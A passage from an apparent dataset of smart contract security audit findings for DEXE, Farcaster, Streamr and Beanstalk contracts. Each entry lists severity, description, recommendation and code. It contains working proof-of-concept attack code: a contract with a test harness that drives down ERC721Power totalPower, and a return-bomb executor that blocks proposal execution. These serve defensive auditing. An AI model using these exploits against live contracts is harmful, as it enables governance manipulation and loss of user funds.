""hardhat/console.sol"";\\n\\ncontract ERC721PowerAttack {\\n // this attack can decrease ERC721Power::totalPower close to 0\\n //\\n // this attack works when block.timestamp > nftPower.powerCalcStartTimestamp\\n // by taking advantage calling recalculateNftPower for non-existent nfts\\n function attack2(\\n address nftPowerAddr,\\n uint256 initialTotalPower,\\n uint256 lastTokenId,\\n uint256 attackIterations\\n ) external {\\n ERC721Power nftPower = ERC721Power(nftPowerAddr);\\n\\n // verify attack starts on the correct block\\n require(\\n block.timestamp > nftPower.powerCalcStartTimestamp(),\\n ""ERC721PowerAttack: attack2 requires block.timestamp > nftPower.powerCalcStartTimestamp""\\n );\\n\\n // verify totalPower() correct at starting block\\n require(\\n nftPower.totalPower() == initialTotalPower,\\n ""ERC721PowerAttack: incorrect initial totalPower""\\n );\\n\\n // output totalPower before attack\\n console.log(nftPower.totalPower());\\n\\n // keep calling recalculateNftPower() for non-existent nfts\\n // this lowers ERC721Power::totalPower() every time\\n // can't get it to 0 due to underflow but can get close enough\\n for (uint256 i; i < attackIterations; ) {\\n nftPower.recalculateNftPower(++lastTokenId);\\n unchecked {\\n ++i;\\n }\\n }\\n\\n // output totalPower after attack\\n console.log(nftPower.totalPower());\\n\\n // original totalPower : 10000000000000000000000000000\\n // current totalPower : 900000000000000000000000000\\n require(\\n nftPower.totalPower() == 900000000000000000000000000,\\n ""ERC721PowerAttack: after attack finished totalPower should equal 900000000000000000000000000""\\n );\\n }\\n}\\n```\\n\\nAdd test harness to ERC721Power.test.js:\\n```\\n describe(""audit attacker can manipulate ERC721Power totalPower"", () => {\\n it(""audit attack 2 dramatically lowers ERC721Power totalPower"", async () => {\\n // deploy the ERC721Power nft contract with:\\n // max power of each nft = 100\\n // power reduction 10%\\n // required collateral = 100\\n let maxPowerPerNft = toPercent(""100"");\\n let requiredCollateral = wei(""100"");\\n let powerCalcStartTime = (await getCurrentBlockTime()) + 1000;\\n\\n // create power nft contract\\n await deployNft(powerCalcStartTime, maxPowerPerNft, toPercent(""10""), requiredCollateral);\\n\\n // ERC721Power::totalPower should be zero as no nfts yet created\\n assert.equal((await nft.totalPower()).toFixed(), toPercent(""0"").times(1).toFixed());\\n\\n // create the attack contract\\n const ERC721PowerAttack = artifacts.require(""ERC721PowerAttack"");\\n let attackContract = await ERC721PowerAttack.new();\\n\\n // create 10 power nfts for SECOND\\n await nft.safeMint(SECOND, 1);\\n await nft.safeMint(SECOND, 2);\\n await nft.safeMint(SECOND, 3);\\n await nft.safeMint(SECOND, 4);\\n await nft.safeMint(SECOND, 5);\\n await nft.safeMint(SECOND, 6);\\n await nft.safeMint(SECOND, 7);\\n await nft.safeMint(SECOND, 8);\\n await nft.safeMint(SECOND, 9);\\n await nft.safeMint(SECOND, 10);\\n\\n // verify ERC721Power::totalPower has been increased by max power for all nfts\\n assert.equal((await nft.totalPower()).toFixed(), maxPowerPerNft.times(10).toFixed());\\n\\n // fast forward time to just after the start of power calculation\\n await setTime(powerCalcStartTime);\\n\\n // launch the attack\\n await attackContract.attack2(nft.address, maxPowerPerNft.times(10).toFixed(), 10, 91);\\n });\\n });\\n```\\n\\nRun attack with: `npx hardhat test --grep ""audit attack 2 dramatically lowers ERC721Power totalPower""`","```\\nfunction getNftPower(uint256 tokenId) public view override returns (uint256) {\\n if (block.timestamp <= powerCalcStartTimestamp) {\\n return 0;\\n }\\n\\n // @audit 0 for non-existent tokenId\\n uint256 collateral = nftInfos[tokenId].currentCollateral;\\n\\n // Calculate the minimum possible power based on the collateral of the nft\\n // @audit returns default maxPower for non-existent tokenId\\n uint256 maxNftPower = getMaxPowerForNft(tokenId);\\n uint256 minNftPower = maxNftPower.ratio(collateral, getRequiredCollateralForNft(tokenId));\\n minNftPower = maxNftPower.min(minNftPower);\\n\\n // Get last update and current power. Or set them to default if it is first iteration\\n // @audit both 0 for non-existent tokenId\\n uint64 lastUpdate = nftInfos[tokenId].lastUpdate;\\n uint256 currentPower = nftInfos[tokenId].currentPower;\\n\\n if (lastUpdate == 0) {\\n lastUpdate = powerCalcStartTimestamp;\\n // @audit currentPower set to maxNftPower which\\n // is just the default maxPower even for non-existent tokenId!\\n currentPower = maxNftPower;\\n }\\n\\n // Calculate reduction amount\\n uint256 powerReductionPercent = reductionPercent * (block.timestamp - lastUpdate);\\n uint256 powerReduction = currentPower.min(maxNftPower.percentage(powerReductionPercent));\\n uint256 newPotentialPower = currentPower - powerReduction;\\n\\n // @audit returns newPotentialPower slightly reduced\\n // from maxPower for non-existent tokenId\\n if (minNftPower <= newPotentialPower) {\\n return newPotentialPower;\\n }\\n\\n if (minNftPower <= currentPower) {\\n return minNftPower;\\n }\\n\\n return currentPower;\\n}\\n\\nfunction recalculateNftPower(uint256 tokenId) public override returns (uint256 newPower) {\\n if (block.timestamp < powerCalcStartTimestamp) {\\n return 0;\\n }\\n\\n // @audit newPower > 0 for non-existent tokenId\\n newPower = getNftPower(tokenId);\\n\\n NftInfo storage nftInfo = nftInfos[tokenId];\\n\\n // @audit as this is the first update since\\n // tokenId doesn't exist, totalPower will be\\n // subtracted by nft's max power\\n totalPower -= nftInfo.lastUpdate != 0 ? nftInfo.currentPower : getMaxPowerForNft(tokenId);\\n // @audit then totalPower is increased by newPower where:\\n // 0 < newPower < maxPower hence net decrease to totalPower\\n totalPower += newPower;\\n\\n nftInfo.lastUpdate = uint64(block.timestamp);\\n nftInfo.currentPower = newPower;\\n}\\n```\\n" +`GovPool::delegateTreasury` does not verify transfer of tokens and NFTs to delegatee leading to potential voting manipulation,high,"`GovPool::delegateTreasury` transfers ERC20 tokens & specific nfts from DAO treasury to `govUserKeeper`. Based on this transfer, the `tokenBalance` and `nftBalance` of the delegatee is increased. This allows a delegatee to use this delegated voting power to vote in critical proposals.\\nAs the following snippet of `GovPool::delegateTreasury` function shows, there is no verification that the tokens and nfts are actually transferred to the `govUserKeeper`. It is implicitly assumed that a successful transfer is completed and subsequently, the voting power of the delegatee is increased.\\n```\\n function delegateTreasury(\\n address delegatee,\\n uint256 amount,\\n uint256[] calldata nftIds\\n ) external override onlyThis {\\n require(amount > 0 || nftIds.length > 0, ""Gov: empty delegation"");\\n require(getExpertStatus(delegatee), ""Gov: delegatee is not an expert"");\\n\\n _unlock(delegatee);\\n\\n if (amount != 0) {\\n address token = _govUserKeeper.tokenAddress();\\n\\n > IERC20(token).transfer(address(_govUserKeeper), amount.from18(token.decimals())); //@audit no check if tokens are actually transferred\\n\\n _govUserKeeper.delegateTokensTreasury(delegatee, amount);\\n }\\n\\n if (nftIds.length != 0) {\\n IERC721 nft = IERC721(_govUserKeeper.nftAddress());\\n\\n for (uint256 i; i < nftIds.length; i++) {\\n > nft.safeTransferFrom(address(this), address(_govUserKeeper), nftIds[i]); //-n no check if nft's are actually transferred\\n }\\n\\n _govUserKeeper.delegateNftsTreasury(delegatee, nftIds);\\n }\\n\\n _revoteDelegated(delegatee, VoteType.TreasuryVote);\\n\\n emit DelegatedTreasury(delegatee, amount, nftIds, true);\\n }\\n```\\n\\nThis could lead to a dangerous situation where a malicious DAO treasury can increase voting power manifold while actually transferring tokens only once (or even, not transfer at all). This breaks the invariance that the total accounting balances in `govUserKeeper` contract must match the actual token balances in that contract.","Since DEXE starts out with a trustless assumption that does not give any special trust privileges to a DAO treasury, it is always prudent to follow the ""trust but verify"" approach when it comes to non-standard tokens, both ERC20 and ERC721. To that extent, consider adding verification of token & nft balance increase before/after token transfer.","Since both the ERC20 and ERC721 token implementations are controlled by the DAO, and since we are dealing with upgradeable token contracts, there is a potential rug-pull vector created by the implicit transfer assumption above.","```\\n function delegateTreasury(\\n address delegatee,\\n uint256 amount,\\n uint256[] calldata nftIds\\n ) external override onlyThis {\\n require(amount > 0 || nftIds.length > 0, ""Gov: empty delegation"");\\n require(getExpertStatus(delegatee), ""Gov: delegatee is not an expert"");\\n\\n _unlock(delegatee);\\n\\n if (amount != 0) {\\n address token = _govUserKeeper.tokenAddress();\\n\\n > IERC20(token).transfer(address(_govUserKeeper), amount.from18(token.decimals())); //@audit no check if tokens are actually transferred\\n\\n _govUserKeeper.delegateTokensTreasury(delegatee, amount);\\n }\\n\\n if (nftIds.length != 0) {\\n IERC721 nft = IERC721(_govUserKeeper.nftAddress());\\n\\n for (uint256 i; i < nftIds.length; i++) {\\n > nft.safeTransferFrom(address(this), address(_govUserKeeper), nftIds[i]); //-n no check if nft's are actually transferred\\n }\\n\\n _govUserKeeper.delegateNftsTreasury(delegatee, nftIds);\\n }\\n\\n _revoteDelegated(delegatee, VoteType.TreasuryVote);\\n\\n emit DelegatedTreasury(delegatee, amount, nftIds, true);\\n }\\n```\\n" +Voting to change `RewardsInfo::voteRewardsCoefficient` has an unintended side-effect of retrospectively changing voting rewards for active proposals,medium,"`GovSettings::editSettings` is one of the functions that can be executed via an internal proposal. When this function is called, setting are validated via `GovSettings::_validateProposalSettings`. This function does not check the value of `RewardsInfo::voteRewardsCoefficient` while updating the settings. There is neither a floor nor a cap for this setting.\\nHowever, we've noted that this coefficient amplifies voting rewards as calculated in the `GovPoolRewards::_getInitialVotingRewards` shown below.\\n```\\n function _getInitialVotingRewards(\\n IGovPool.ProposalCore storage core,\\n IGovPool.VoteInfo storage voteInfo\\n ) internal view returns (uint256) {\\n (uint256 coreVotes, uint256 coreRawVotes) = voteInfo.isVoteFor\\n ? (core.votesFor, core.rawVotesFor)\\n : (core.votesAgainst, core.rawVotesAgainst);\\n\\n return\\n coreRawVotes.ratio(core.settings.rewardsInfo.voteRewardsCoefficient, PRECISION).ratio(\\n voteInfo.totalVoted,\\n coreVotes\\n ); //@audit -> initial rewards are calculated proportionate to the vote rewards coefficient\\n }\\n```\\n\\nThis has the unintended side-effect that for the same proposal, different voters can get paid different rewards based on when the reward was claimed. In the extreme case where `core.settings.rewardsInfo.voteRewardsCoefficient` is voted to 0, note that we have a situation where voters who claimed rewards before the update got paid as promised whereas voters who claimed later got nothing.",Consider freezing `voteRewardMultiplier` and the time of proposal creation. A prospective update of this setting via internal voting should not change rewards for old proposals.,"Updating `rewardsCoefficient` can lead to unfair reward distribution on old proposals. Since voting rewards for a given proposal are communicated upfront, this could lead to a situation where promised rewards to users are not honoured.\\nProof of Concept: N/A","```\\n function _getInitialVotingRewards(\\n IGovPool.ProposalCore storage core,\\n IGovPool.VoteInfo storage voteInfo\\n ) internal view returns (uint256) {\\n (uint256 coreVotes, uint256 coreRawVotes) = voteInfo.isVoteFor\\n ? (core.votesFor, core.rawVotesFor)\\n : (core.votesAgainst, core.rawVotesAgainst);\\n\\n return\\n coreRawVotes.ratio(core.settings.rewardsInfo.voteRewardsCoefficient, PRECISION).ratio(\\n voteInfo.totalVoted,\\n coreVotes\\n ); //@audit -> initial rewards are calculated proportionate to the vote rewards coefficient\\n }\\n```\\n" +Proposal execution can be DOSed with return bombs when calling untrusted execution contracts,medium,"`GovPool::execute` does not check for return bombs when executing a low-level call. A return bomb is a large bytes array that expands the memory so much that any attempt to execute the transaction will lead to an `out-of-gas` exception.\\nThis can create potentially risky outcomes for the DAO. One possible outcome is ""single sided"" execution, ie. ""actionsFor"" can be executed when voting is successful while ""actionsAgainst"" can be DOSed when voting fails.\\nA clever proposal creator can design a proposal in such a way that only `actionsFor` can be executed and any attempts to execute `actionsAgainst` will be permanently DOS'ed (refer POC contract). T\\nThis is possible because the `GovPoolExecute::execute` does a low level call on potentially untrusted `executor` assigned to a specific action.\\n```\\n function execute(\\n mapping(uint256 => IGovPool.Proposal) storage proposals,\\n uint256 proposalId\\n ) external {\\n // rest of code. // code\\n\\n for (uint256 i; i < actionsLength; i++) {\\n> (bool status, bytes memory returnedData) = actions[i].executor.call{\\n value: actions[i].value\\n }(actions[i].data); //@audit returnedData could expand memory and cause out-of-gas exception\\n\\n require(status, returnedData.getRevertMsg());\\n }\\n }\\n```\\n",Consider using `ExcessivelySafeCall` while calling untrusted contracts to avoid return bombs.,"Voting actions can be manipulated by a creator causing two potential issues:\\nProposal actions can never be executed even after successful voting\\nOne-sided execution where some actions can be executed while others can be DOSed\\nProof of Concept: Consider the following malicious proposal action executor contract. Note that when the proposal passes (isVotesFor = true), the `vote()` function returns empty bytes and when the proposal fails (isVotesFor = false), the same function returns a huge bytes array, effectively causing an ""out-of-gas"" exception to any caller.\\n```\\ncontract MaliciousProposalActionExecutor is IProposalValidator{\\n\\n function validate(IGovPool.ProposalAction[] calldata actions) external view override returns (bool valid){\\n valid = true;\\n }\\n\\n function vote(\\n uint256 proposalId,\\n bool isVoteFor,\\n uint256 voteAmount,\\n uint256[] calldata voteNftIds\\n ) external returns(bytes memory result){\\n\\n if(isVoteFor){\\n // @audit implement actions for successful vote\\n return """"; // 0 bytes\\n }\\n else{\\n // @audit implement actions for failed vote\\n\\n // Create a large bytes array\\n assembly{\\n revert(0, 1_000_000)\\n }\\n }\\n\\n }\\n}\\n```\\n","```\\n function execute(\\n mapping(uint256 => IGovPool.Proposal) storage proposals,\\n uint256 proposalId\\n ) external {\\n // rest of code. // code\\n\\n for (uint256 i; i < actionsLength; i++) {\\n> (bool status, bytes memory returnedData) = actions[i].executor.call{\\n value: actions[i].value\\n }(actions[i].data); //@audit returnedData could expand memory and cause out-of-gas exception\\n\\n require(status, returnedData.getRevertMsg());\\n }\\n }\\n```\\n" +Use low-level `call()` to prevent gas griefing attacks when returned data not required,low,"Using `call()` when the returned data is not required unnecessarily exposes to gas griefing attacks from huge returned data payload. For example:\\n```\\n(bool status, ) = payable(receiver).call{value: amount}("""");\\nrequire(status, ""Gov: failed to send eth"");\\n```\\n\\nIs the same as writing:\\n```\\n(bool status, bytes memory data ) = payable(receiver).call{value: amount}("""");\\nrequire(status, ""Gov: failed to send eth"");\\n```\\n\\nIn both cases the returned data will have to be copied into memory exposing the contract to gas griefing attacks, even though the returned data is not required at all.","Use a low-level call when the returned data is not required, eg:\\n```\\nbool status;\\nassembly {\\n status := call(gas(), receiver, amount, 0, 0, 0, 0)\\n}\\n```\\n\\nConsider using ExcessivelySafeCall.",Contracts unnecessarily expose themselves to gas griefing attacks.,"```\\n(bool status, ) = payable(receiver).call{value: amount}("""");\\nrequire(status, ""Gov: failed to send eth"");\\n```\\n" +`abi.encodePacked()` should not be used with dynamic types when passing the result to a hash function such as `keccak256()`,low,"`abi.encodePacked()` should not be used with dynamic types when passing the result to a hash function such as `keccak256()`.\\nUse `abi.encode()` instead which will pad items to 32 bytes, which will prevent hash collisions (e.g. `abi.encodePacked(0x123,0x456)` => `0x123456` => `abi.encodePacked(0x1,0x23456)`, but `abi.encode(0x123,0x456)` => 0x0...1230...456).\\nUnless there is a compelling reason, `abi.encode` should be preferred. If there is only one argument to `abi.encodePacked()` it can often be cast to `bytes()` or `bytes32()` instead. If all arguments are strings and or bytes, `bytes.concat()` should be used instead.\\nProof of Concept:\\n```\\nFile: factory/PoolFactory.sol\\n\\n return keccak256(abi.encodePacked(deployer, poolName));\\n```\\n\\n```\\nFile: libs/gov/gov-pool/GovPoolOffchain.sol\\n\\n return keccak256(abi.encodePacked(resultsHash, block.chainid, address(this)));\\n```\\n\\n```\\nFile: user/UserRegistry.sol\\n\\n _signatureHashes[_documentHash][msg.sender] = keccak256(abi.encodePacked(signature));\\n```\\n",See description.,,"```\\nFile: factory/PoolFactory.sol\\n\\n return keccak256(abi.encodePacked(deployer, poolName));\\n```\\n" +A removal signature might be applied to the wrong `fid`.,medium,"A remove signature is used to remove a key from `fidOwner` using `KeyRegistry.removeFor()`. And the signature is verified in `_verifyRemoveSig()`.\\n```\\n function _verifyRemoveSig(address fidOwner, bytes memory key, uint256 deadline, bytes memory sig) internal {\\n _verifySig(\\n _hashTypedDataV4(\\n keccak256(abi.encode(REMOVE_TYPEHASH, fidOwner, keccak256(key), _useNonce(fidOwner), deadline))\\n ),\\n fidOwner,\\n deadline,\\n sig\\n );\\n }\\n```\\n\\nBut the signature doesn't specify a `fid` to remove and the below scenario would be possible.\\nAlice is an owner of `fid1` and she created a removal signature to remove a `key` but it's not used yet.\\nFor various reasons, she became an owner of `fid2`.\\n`fid2` has a `key` also but she doesn't want to remove it.\\nBut if anyone calls `removeFor()` with her previous signature, the `key` will be removed from `fid2` unexpectedly.\\nOnce a key is removed, `KeyState` will be changed to `REMOVED` and anyone including the owner can't retrieve it.",The removal signature should contain `fid` also to be invalidated for another `fid`.,A key remove signature might be used for an unexpected `fid`.,"```\\n function _verifyRemoveSig(address fidOwner, bytes memory key, uint256 deadline, bytes memory sig) internal {\\n _verifySig(\\n _hashTypedDataV4(\\n keccak256(abi.encode(REMOVE_TYPEHASH, fidOwner, keccak256(key), _useNonce(fidOwner), deadline))\\n ),\\n fidOwner,\\n deadline,\\n sig\\n );\\n }\\n```\\n" +`VoteKickPolicy._endVote()` might revert forever due to underflow,high,"In `onFlag()`, `targetStakeAtRiskWei[target]` might be less than the total rewards for the flagger/reviewers due to rounding.\\n```\\nFile: contracts\\OperatorTokenomics\\StreamrConfig.sol\\n /**\\n * Minimum amount to pay reviewers+flagger\\n * That is: minimumStakeWei >= (flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei) / slashingFraction\\n */\\n function minimumStakeWei() public view returns (uint) {\\n return (flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei) * 1 ether / slashingFraction;\\n }\\n```\\n\\nLet's assume `flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei = 100, StreamrConfig.slashingFraction = 0.03e18(3%), minimumStakeWei() = 1000 * 1e18 / 0.03e18 = 10000 / 3 = 3333.`\\nIf we suppose `stakedWei[target] = streamrConfig.minimumStakeWei()`, then `targetStakeAtRiskWei[target]` = 3333 * 0.03e18 / 1e18 = 99.99 = 99.\\nAs a result, `targetStakeAtRiskWei[target]` is less than total rewards(=100), and `_endVote()` will revert during the reward distribution due to underflow.\\nThe above scenario is possible only when there is a rounding during `minimumStakeWei` calculation. So it works properly with the default `slashingFraction = 10%`.",Always round the `minimumStakeWei()` up.,The `VoteKickPolicy` wouldn't work as expected and malicious operators won't be kicked forever.,```\\nFile: contracts\\OperatorTokenomics\\StreamrConfig.sol\\n /**\\n * Minimum amount to pay reviewers+flagger\\n * That is: minimumStakeWei >= (flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei) / slashingFraction\\n */\\n function minimumStakeWei() public view returns (uint) {\\n return (flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei) * 1 ether / slashingFraction;\\n }\\n```\\n +Possible overflow in `_payOutFirstInQueue`,high,"In `_payOutFirstInQueue()`, possible revert during `operatorTokenToDataInverse()`.\\n```\\nuint amountOperatorTokens = moduleCall(address(exchangeRatePolicy), abi.encodeWithSelector(exchangeRatePolicy.operatorTokenToDataInverse.selector, amountDataWei));\\n```\\n\\nIf a delegator calls `undelegate()` with `type(uint256).max`, `operatorTokenToDataInverse()` will revert due to uint overflow and the queue logic will be broken forever.\\n```\\n function operatorTokenToDataInverse(uint dataWei) external view returns (uint operatorTokenWei) {\\n return dataWei * this.totalSupply() / valueWithoutEarnings();\\n }\\n```\\n",We should cap `amountDataWei` before calling `operatorTokenToDataInverse()`.,The queue logic will be broken forever because `_payOutFirstInQueue()` keeps reverting.,"```\\nuint amountOperatorTokens = moduleCall(address(exchangeRatePolicy), abi.encodeWithSelector(exchangeRatePolicy.operatorTokenToDataInverse.selector, amountDataWei));\\n```\\n" +Wrong validation in `DefaultUndelegationPolicy.onUndelegate()`,high,"In `onUndelegate()`, it checks if the operator owner still holds at least `minimumSelfDelegationFraction` of total supply.\\n```\\n function onUndelegate(address delegator, uint amount) external {\\n // limitation only applies to the operator, others can always undelegate\\n if (delegator != owner) { return; }\\n\\n uint actualAmount = amount < balanceOf(owner) ? amount : balanceOf(owner); //@audit amount:DATA, balanceOf:Operator\\n uint balanceAfter = balanceOf(owner) - actualAmount;\\n uint totalSupplyAfter = totalSupply() - actualAmount;\\n require(1 ether * balanceAfter >= totalSupplyAfter * streamrConfig.minimumSelfDelegationFraction(), ""error_selfDelegationTooLow"");\\n }\\n```\\n\\nBut `amount` means the DATA token `amount` and `balanceOf(owner)` indicates the `Operator` token balance and it's impossible to compare them directly.",`onUndelegate()` should compare amounts after converting to the same token.,The operator owner wouldn't be able to undelegate because `onUndelegate()` works unexpectedly.,"```\\n function onUndelegate(address delegator, uint amount) external {\\n // limitation only applies to the operator, others can always undelegate\\n if (delegator != owner) { return; }\\n\\n uint actualAmount = amount < balanceOf(owner) ? amount : balanceOf(owner); //@audit amount:DATA, balanceOf:Operator\\n uint balanceAfter = balanceOf(owner) - actualAmount;\\n uint totalSupplyAfter = totalSupply() - actualAmount;\\n require(1 ether * balanceAfter >= totalSupplyAfter * streamrConfig.minimumSelfDelegationFraction(), ""error_selfDelegationTooLow"");\\n }\\n```\\n" +Malicious target can make `_endVote()` revert forever by forceUnstaking/staking again,high,"In `_endVote()`, we update `forfeitedStakeWei` or `lockedStakeWei[target]` according to the target's staking status.\\n```\\nFile: contracts\\OperatorTokenomics\\SponsorshipPolicies\\VoteKickPolicy.sol\\n function _endVote(address target) internal {\\n address flagger = flaggerAddress[target];\\n bool flaggerIsGone = stakedWei[flagger] == 0;\\n bool targetIsGone = stakedWei[target] == 0;\\n uint reviewerCount = reviewers[target].length;\\n // release stake locks before vote resolution so that slashings and kickings during resolution aren't affected\\n // if either the flagger or the target has forceUnstaked or been kicked, the lockedStakeWei was moved to forfeitedStakeWei\\n if (flaggerIsGone) {\\n forfeitedStakeWei -= flagStakeWei[target];\\n } else {\\n lockedStakeWei[flagger] -= flagStakeWei[target];\\n }\\n if (targetIsGone) {\\n forfeitedStakeWei -= targetStakeAtRiskWei[target];\\n } else {\\n lockedStakeWei[target] -= targetStakeAtRiskWei[target]; //@audit revert after forceUnstake() => stake() again\\n }\\n```\\n\\nWe consider the target is still active if he has a positive staking amount. But we don't know if he has unstaked and staked again, so the below scenario would be possible.\\nThe target staked 100 amount and a flagger reported him.\\nIn `onFlag()`, `lockedStakeWei[target]` = targetStakeAtRiskWei[target] = 100.\\nDuring the voting period, the target called `forceUnstake()`. Then `lockedStakeWei[target]` was reset to 0 in `Sponsorship._removeOperator()`.\\nAfter that, he stakes again and `_endVote()` will revert forever at L195 due to underflow.\\nAfter all, he won't be flagged again because the current flagging won't be finalized.\\nFurthermore, malicious operators would manipulate the above state by themselves to earn operator rewards without any risks.",Perform stake unlocks in `_endVote()` without relying on the current staking amounts.,Malicious operators can bypass the flagging system by reverting `_endVote()` forever.,"```\\nFile: contracts\\OperatorTokenomics\\SponsorshipPolicies\\VoteKickPolicy.sol\\n function _endVote(address target) internal {\\n address flagger = flaggerAddress[target];\\n bool flaggerIsGone = stakedWei[flagger] == 0;\\n bool targetIsGone = stakedWei[target] == 0;\\n uint reviewerCount = reviewers[target].length;\\n // release stake locks before vote resolution so that slashings and kickings during resolution aren't affected\\n // if either the flagger or the target has forceUnstaked or been kicked, the lockedStakeWei was moved to forfeitedStakeWei\\n if (flaggerIsGone) {\\n forfeitedStakeWei -= flagStakeWei[target];\\n } else {\\n lockedStakeWei[flagger] -= flagStakeWei[target];\\n }\\n if (targetIsGone) {\\n forfeitedStakeWei -= targetStakeAtRiskWei[target];\\n } else {\\n lockedStakeWei[target] -= targetStakeAtRiskWei[target]; //@audit revert after forceUnstake() => stake() again\\n }\\n```\\n" +"In `VoteKickPolicy.onFlag()`, `targetStakeAtRiskWei[target]` might be greater than `stakedWei[target]` and `_endVote()` would revert.",medium,"`targetStakeAtRiskWei[target]` might be greater than `stakedWei[target]` in `onFlag()`.\\n```\\ntargetStakeAtRiskWei[target] = max(stakedWei[target], streamrConfig.minimumStakeWei()) * streamrConfig.slashingFraction() / 1 ether;\\n```\\n\\nFor example,\\nAt the first time, `streamrConfig.minimumStakeWei()` = 100 and an operator(=target) has staked 100.\\n`streamrConfig.minimumStakeWei()` was increased to 2000 after a reconfiguration.\\n`onFlag()` is called for target and `targetStakeAtRiskWei[target]` will be `max(100, 2000) * 10% = 200`.\\nIn `_endVote()`, `slashingWei = _kick(target, slashingWei)` will be 100 because target has staked 100 only.\\nSo it will revert due to underflow during the reward distribution.",`onFlag()` should check if a target has staked enough funds for rewards and handle separately if not.,Operators with small staked funds wouldn't be kicked forever.,"```\\ntargetStakeAtRiskWei[target] = max(stakedWei[target], streamrConfig.minimumStakeWei()) * streamrConfig.slashingFraction() / 1 ether;\\n```\\n" +Possible front running of `flag()`,medium,"The `target` might call `unstake()/forceUnstake()` before a flagger calls `flag()` to avoid a possible fund loss. Also, there would be no slash during the unstaking for `target` when it meets the `penaltyPeriodSeconds` requirement.\\n```\\nFile: contracts\\OperatorTokenomics\\SponsorshipPolicies\\VoteKickPolicy.sol\\n function onFlag(address target, address flagger) external {\\n require(flagger != target, ""error_cannotFlagSelf"");\\n require(voteStartTimestamp[target] == 0 && block.timestamp > protectionEndTimestamp[target], ""error_cannotFlagAgain""); // solhint-disable-line not-rely-on-time\\n require(stakedWei[flagger] >= minimumStakeOf(flagger), ""error_notEnoughStake"");\\n require(stakedWei[target] > 0, ""error_flagTargetNotStaked""); //@audit possible front run\\n```\\n",There is no straightforward mitigation but we could implement a kind of `delayed unstaking` logic for some percent of staking funds.,A malicious target would bypass the kick policy by front running.,"```\\nFile: contracts\\OperatorTokenomics\\SponsorshipPolicies\\VoteKickPolicy.sol\\n function onFlag(address target, address flagger) external {\\n require(flagger != target, ""error_cannotFlagSelf"");\\n require(voteStartTimestamp[target] == 0 && block.timestamp > protectionEndTimestamp[target], ""error_cannotFlagAgain""); // solhint-disable-line not-rely-on-time\\n require(stakedWei[flagger] >= minimumStakeOf(flagger), ""error_notEnoughStake"");\\n require(stakedWei[target] > 0, ""error_flagTargetNotStaked""); //@audit possible front run\\n```\\n" +"In `Operator._transfer()`, `onDelegate()` should be called after updating the token balances",medium,"In `_transfer()`, `onDelegate()` is called to validate the owner's `minimumSelfDelegationFraction` requirement.\\n```\\nFile: contracts\\OperatorTokenomics\\Operator.sol\\n // transfer creates a new delegator: check if the delegation policy allows this ""delegation""\\n if (balanceOf(to) == 0) {\\n if (address(delegationPolicy) != address(0)) {\\n moduleCall(address(delegationPolicy), abi.encodeWithSelector(delegationPolicy.onDelegate.selector, to)); //@audit\\nshould be called after _transfer()\\n }\\n }\\n super._transfer(from, to, amount);\\n```\\n\\nBut `onDelegate()` is called before updating the token balances and the below scenario would be possible.\\nThe operator owner has 100 shares(required minimum fraction). And there are no undelegation policies.\\nLogically, the owner shouldn't be able to transfer his 100 shares to a new delegator due to the min fraction requirement in `onDelegate()`.\\nBut if the owner calls `transfer(owner, to, 100)`, `balanceOf(owner)` will be 100 in `onDelegation()` and it will pass the requirement because it's called before `super._transfer()`.",`onDelegate()` should be called after `super._transfer()`.,"The operator owner might transfer his shares to other delegators in anticipation of slashing, to avoid slashing.","```\\nFile: contracts\\OperatorTokenomics\\Operator.sol\\n // transfer creates a new delegator: check if the delegation policy allows this ""delegation""\\n if (balanceOf(to) == 0) {\\n if (address(delegationPolicy) != address(0)) {\\n moduleCall(address(delegationPolicy), abi.encodeWithSelector(delegationPolicy.onDelegate.selector, to)); //@audit\\nshould be called after _transfer()\\n }\\n }\\n super._transfer(from, to, amount);\\n```\\n" +`onTokenTransfer` does not validate if the call is from the DATA token contract,medium,"`SponsorshipFactory::onTokenTransfer` and `OperatorFactory::onTokenTransfer` are used to handle the token transfer and contract deployment in a single transaction. But there is no validation that the call is from the DATA token contract and anyone can call these functions.\\nThe impact is low for `Sponsorship` deployment, but for `Operator` deployment, `ClonesUpgradeable.cloneDeterministic` is used with a salt based on the operator token name and the operator address. An attacker can abuse this to cause DoS for deployment.\\nWe see that this validation is implemented correctly in other contracts like `Operator`.\\n```\\n if (msg.sender != address(token)) {\\n revert AccessDeniedDATATokenOnly();\\n }\\n```\\n",Add a validation to ensure the caller is the actual DATA contract.,Attackers can prevent the deployment of `Operator` contracts.,```\\n if (msg.sender != address(token)) {\\n revert AccessDeniedDATATokenOnly();\\n }\\n```\\n +"Insufficient validation of new Fertilizer IDs allow for a denial-of-service (DoS) attack on `SeasonFacet::gm` when above peg, once the last element in the FIFO is paid",medium,"A Fertilizer NFT can be interpreted as a bond without an expiration date which is to be repaid in Beans and includes interest (Humidity). This bond is placed in a FIFO list and intended to recapitalize the $77 million in liquidity stolen during the April 2022 exploit. One Fertilizer can be purchased for 1 USD worth of WETH: prior to BIP-38, this purchase was made using USDC.\\nEach fertilizer is identified by an Id that depends on `s.bpf`, indicating the cumulative amount of Beans paid per Fertilizer. This value increases each time `Sun::rewardToFertilizer` is called, invoked by `SeasonFacet::gm` if the Bean price is above peg. Therefore, Fertilizer IDs depend on `s.bpf` at the moment of minting, in addition to the amount of Beans to be paid.\\nThe FIFO list has following components:\\ns.fFirst: Fertilizer Id corresponding to the next Fertilizer to be paid.\\ns.fLast: The highest active Fertilizer Id which is the last Fertilizer to be paid.\\ns.nextFid: Mapping from Fertilizer Id to Fertilizer id, indicating the next element of a linked list. If an Id points to 0, then there is no next element.\\nMethods related to this FIFO list include: LibFertilizer::push: Add an element to the FIFO list. LibFertilizer::setNext: Given a fertilizer id, add a pointer to next element in the list LibFertilizer::getNext: Get next element in the list.\\nThe intended behaviour of this list is to add a new element to its end whenever a new fertilizer is minted with a new Id. Intermediate addition to the list was formerly allowed only by the Beanstalk DAO, but this functionality has since been deprecated in the current upgrade with the removal of `FertilizerFacet::addFertilizerOwner`.\\nConsequences of replacing BEAN:3CRV MetaPool with the BEAN:ETH Well: Before this upgrade, addition of 0 Fertilizer through `LibFertilizer::addFertilizer` was impossible due to the dependency on Curve in LibFertilizer::addUnderlying:\\n```\\n// Previous code\\n\\n function addUnderlying(uint256 amount, uint256 minAmountOut) internal {\\n //// rest of code\\n C.bean().mint(\\n address(this),\\n 